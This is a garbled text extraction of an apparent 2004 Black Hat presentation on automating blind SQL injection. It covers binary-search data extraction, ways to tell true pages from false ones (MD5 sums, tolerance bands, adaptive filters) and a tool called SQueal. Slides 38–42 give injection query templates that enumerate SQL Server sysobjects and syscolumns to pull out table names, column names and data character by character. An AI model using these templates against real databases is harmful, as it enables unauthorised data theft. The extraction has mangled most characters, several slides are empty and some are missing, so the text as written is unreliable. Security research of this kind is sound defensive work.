blind sql injection autmation tecniques by cameroin hotchkies.pdf

8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf

1/48

Blind SQL InjectionAutomation Techniques

Black Hat Briefings USA

2004Cameron [email protected]


2/48

What is SQ !n"ection#

$ Client s%&&lie' 'ata &asse' to ana&&lication (itho%t a&&ro&riate

'ata )ali'ation$ *rocesse' as comman's +, the

'ata+ase


3/48

-re%entl, Use' /o

$ *erform o&erations on the'ata+ase

$ B,&ass a%thentication mechanisms

$ 1ea' other(ise %na)aila+leinformation from the 'ata+ase

$ Write information s%ch as ne(%ser acco%nts to the 'ata+ase


4/48

/hree -orms of SQ !n"ection

$ /here are three main forms of SQ!n"ection %se' to rea' information

from a 'ata+ase1e'irection an' resha&ing a %er,

3rror message +ase'

Blin' !n"ection


5/48

Blin' SQ !n"ection

$ Blin' SQ !n"ection techni%es canincl%'e forming %eries res%lting in

+oolean )al%es an' inter&reting theo%t&%t H/5 &ages

$ SQ !n"ection can res%lt in significant'ata leakage an'6or 'ata mo'ification

attacks

$ Blin' attacks are essentiall, &la,ing 20%estions (ith the (e+ ser)er


6/48

Wh, foc%s on Blin'

!n"ections#$ Blin' in"ections are as common as

an, other in"ection

$ Blin' holes in)ol)e a false sense ofsec%rit, on the host

$ 1e%ires a larger in)estment of

time to exec%te man%al&enetration against


7/48

Benefits of an A%tomate' /ool

$ We can ask the ser)er as man, ,es6no%estions as (e (ant

$ -in'ing the first letter of a %sername(ith a +inar, search takes 7 re%ests

$ -in'ing the f%ll %sername if it8s characters takes :; re%ests

$ /o fin' the %sername is characterstakes ; re%ests

$ ;2 re%ests "%st to fin' the %sername

$ /his a''s %&


8/48

Benefits Cont8'

$ Ass%ming it takes


9/48

Benefits Cont8'

$ !f ,o% (ant non=tri)ial &enetration

/a+le names

Col%mn names

Act%al >ata

$ /his (o%l' take ho%rs or 'a,s or

longer 'e&en'ing on the si?e ofthe 'ata+ase


10/48

So%n' Sim&le#

An effecti)e tool is more com&lex than

a few shell scripts and netcat


11/48


12/48


13/48


14/48

Searching for !ntegers

$ Select a range %s%all, starting (ith 0

$ !ncrease )al%e ex&onentiall, +, a factor

of t(o %ntil %&&er limit is 'isco)ere'$ *artition half(a, +et(een %&&er limit

an' &re)io%s )al%e

$ Contin%e to hal)e sections %ntil one)al%e remains


15/48

*ro+lem

$ Ho( 'o (e recogni?e tr%e )s false &agesfrom the (e+ ser)er#

We take &attern recognition for grante' Can8t (e "%st 'o a string com&are#

$ D /he (hole &oint of a (e+ a&&lication is to

ha)e ',namic content

!t8s entirel, likel, that the section in'icatingthe tr%e6false is not the onl, ',namiccontent

String com&arison is s%ita+le for error

+ase' in"ection +%t not +lin' in"ection


16/48


17/48

Sol%tion ne Ee,(or'

Search$ 1e%ires 'irect inter)ention of the

%ser

$ User interaction re%ires effort to+e ex&en'e' (hich is (hat (e aretr,ing to minimi?e


18/48

Sol%tion /(o 5>: S%m

$ We+ A&&lications are 'esigne' to+e ',namic

$ 5>: ca%ses large o%t&%t changesfrom small in&%t changes


19/48

Foogle )s. Hoogle


20/48

5>: S%m Com&arison

$ 5>: 'oes not han'le changes (ell

$ 5a, (ork on some (e+

a&&lications +%t notcom&rehensi)e


21/48

Sol%tion /hree /ext

>ifference 3ngine$ /ext 'ifference tools are 'esigne'

to highlight informational changes

that (e are not concerne' (ith.$ A lot of effort is (aste' to retain

information that (ill sim&l, +e

'iscar'e'.


22/48

Sol%tion -o%r *arse H/5 /ree

$ 1e&resent text as html entities in a tree'ata str%ct%re

$ ook for 'ifferences in the sha&e of thetrees

$ !f onl, non=mark%& 'ata is changingthere (ill +e no (a, to &rocee' in

a%tomation$ 3asier to im&lement an xhtml &arser

than a realistic html &arser


23/48

Sol%tion -i)e inear

1e&resentation of ASC!!

S%mssmall in&%t )ariation G small o%t&%t

)ariation


24/48

Signat%re Com&arison

$ Fenerating +ase cases Will nee' +ase cases for com&arison of

%nkno(ns

We alrea', kno( g%arantee' tr%e6false&ages

We ha)e m%lti&le o&tions for kno(n +asecases

$ 3asiest is


25/48

Sam&le Signat%re Set


26/48

1ealistic Signat%re Set


27/48

/olerance Ban' Com&arison

$ 5inor changes in text%al contentres%lt in small o)erall changes in

s%m$ Changes still occ%r

$ Allo(ing for tolerance instea' of

exact com&arison in s%ms lessensfalse negati)es

| known unknown| / known


28/48

/olerance Ban' Com&arison


29/48

Shortcomings of /olerance

Ban' Com&arison$ !t (orks +%t there are a lot of

%nnecessar, com&arisons

$ >oesn8t take a')antage of kno(ngar+age 'ata


30/48

S%+tracti)e -ilter

$ We can i'entif, s%ms that are e%al +et(eenconflicting +ase cases


31/48

S%+tracti)e -ilter

$ /his can +e com+ine' (ith the tolerance +an'to eliminate %nnecessar, com&arisons


32/48

A'a&ti)e -ilter

$ Allo(s the a&&lication to +e&rofile' +efore testing against

%nkno(ns$ 1emo)es "%nk 'ata that co%l'

ske( res%lts

$ 1e%ires m%lti&le +ase cases


33/48

/(o !'enticalI Sam&les

< G


34/48

A'a&ti)e -ilter A&&lie'

< G


35/48

Benefits of A'a&ti)e -ilter

$ /olerance is mostl, %nnecessar, atthis &oint

$ 1emo)es most ',namic content%nrelate' to the 'ata leakage


36/48

SQ%ea

$ SQ%ea (as create' alongsi'e theresearch +eing &resente'

$ Written in CJ for Win'o(s K in%x Both Win'o(s.-orms K Ftk=Shar& FU!sa)aila+le

$ -ree for non=commercial %se

Black Hat Conference C>s incl%'e acommerciall, license' )ersion -ree for ,o%

$ 3x&orts 'ata to an L5 format for nice&resentation to clients6*HBs


37/48

SQ%ea 3x&orting >ata

$ SQ%ea %ses it8s o(n L5 format forsa)ing ex&loit 'ata


38/48

Fathering /a+le !nfo

We start (ith the !> n%m+er for each ta+le

... AND S)!)8* 89N*name; +9 sso&ects >))@tpe=cha#'6;; % search_value

... AND S)!)8* INi"; +9 sso&ects >))

i" %prev_table_idAND

@tpe=cha#'6;; % search_value


39/48

5ore /a+le !nfo

We can no( retrie)e each ta+le8srecogni?a+le name

... AND S)!)8* *9 1 !)Nname; +9 sso&ects

>)) i"= table_idAND

@tpe=cha#'6;; % search_value

... AND S)!)8* AS8IIS2S*IN(nameB

character_counterB1;; +9 sso&ects >))

i"=table_id; % search_value


40/48

Fathering -iel' !nformation

nce (e ha)e the ta+le information (ecan mo)e on to the fiel's

... AND S)!)8* 89N*name; +9 sscolumns

>)) i"=table_id; % search_value

... AND S)!)8* INcoli"; +9 sscolumns

>)) coli" %prev_colidAND i"=table_id;

% search_value


41/48

-iel' !nfo Cont8'

... AND S)!)8* *9 1 !)Nname; +9 sso&ects

>)) i"=table_id AND coli"=colid; % search_value

... AND S)!)8* AS8IIS2S*IN(nameBcharacter_counterB 1;; +9 sscolumns >))

i"=table_idAND coli"=colid; % search_value

... AND S)!)8* *9 1 @tpe; +9 sscolumns>)) i"=table_id AND coli"=colid; % search_value


42/48

-iel' >ata /,&es

Fathering fiel' 'ata t,&es is faster +%tre%ires kno(le'ge the t,&e ma&&ing

char2M9NarChar2Moesn8t lo(er the +arI for fin'ing

ex&loits$ /ro%+les (ith no carriage ret%rns 6

a%to generate' H/5


45/48

-orce' C1-

$ What ha&&ens (hen H/5 isgenerate' (itho%t carriage

ret%rns#at%ral ten'enc, to force carriage

ret%rns

/his (ill thro( off the 'ata$ At this &oint an H/5 &arser

(o%l' +e nee'e'


46/48

Concl%sion

$ Same techni%es can +e %tili?e' (ith %eries in'icatingin)ali' SQ

/reat these as %estions s%ch as !s this s,ntax

)ali'#I (hich in no( a ,es6no %estion$ 5>: Ba' for these &%r&oses

$ Same techni%es can +e %tili?e' in other a&&lications tointer&ret res%lts from H/5 res&onses

L*ath !n"ection

>A* !n"ection$ Use *arameteri?e' co'e in an a&&ro&riate fashion to

call store' &roce'%res


47/48

1eferences K S%ggeste'

*a&ersA')ance' SQ !n"ection in SQ Ser)er A&&lications

PChris Anle, FS S,stemshtt&66(((.nextgenss.com6&a&ers6a')ance'RslRin"ection.&'f

more A')ance' SQ !n"ection

PChris Anle, FS S,stemshtt&66(((.nextgenss.com6&a&ers6moreRa')ance'RslRin"ection.&'f

Blin' SQ !n"ection Are ,o%r (e+=a&&s N%lnera+le#PEe)in S&ett S*! >,namicshtt&66(((.s&i',namics.com6(hite&a&ers6Blin'RSQ!n"ection.&'f


48/48

Q%estions K Ans(ers

/his an' other tools are a)aila+lefor 'o(nloa' at

http://[email protected]#g/#eleases/

blind sql injection autmation tecniques by cameroin hotchkies.pdf

Documents